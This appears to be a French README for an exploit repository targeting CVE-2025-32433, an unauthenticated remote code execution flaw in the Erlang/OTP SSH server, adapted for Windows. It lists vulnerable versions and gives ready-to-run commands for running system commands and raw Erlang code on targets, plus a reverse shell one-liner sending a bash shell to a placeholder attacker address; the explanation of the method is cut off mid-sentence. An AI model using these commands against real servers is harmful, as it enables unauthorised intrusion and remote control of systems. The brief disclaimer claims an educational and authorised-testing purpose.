
Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility
Exécution de code à distance non authentifiée SSH Erlang/OTP
Ce dépôt contient un exploit pour CVE-2025-32433, une vulnérabilité critique d'exécution de code à distance non authentifiée dans le serveur SSH Erlang/OTP.
Caractéristiques principales :
CVE ID : CVE-2025-32433
Sévérité : Critique
Impact : Exécution de code à distance non authentifiée
La vulnérabilité permet à des attaquants d'exécuter des commandes système arbitraires sur des serveurs SSH Erlang/OTP sans authentification en envoyant des messages de protocole SSH spécialement conçus.
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 et versions antérieures (probablement)
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target Adresse IP cible (par défaut : 127.0.0.1)
-p, --port Port cible (par défaut : 2222)
-c, --command Commande système à exécuter
-e, --erlang Code Erlang brut à exécuter
Cette version corrige le problème d'encodage présent dans l'exploit original :
Problème : L'exploit original utilisait le caractère de coche Unicode (✓, U+2713) qui provoque des erreurs d'encodage GBK sur Windows :
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
Solution : Remplacé le caractère Unicode par le caractère ASCII standard + pour la compatibilité multiplateforme.
L'exploit fonctionne en :
os:cmd()Cet exploit est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. L'accès non autorisé aux systèmes informatiques est illégal. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test.
Licence MIT
Modifié pour la compatibilité Windows par chuzouX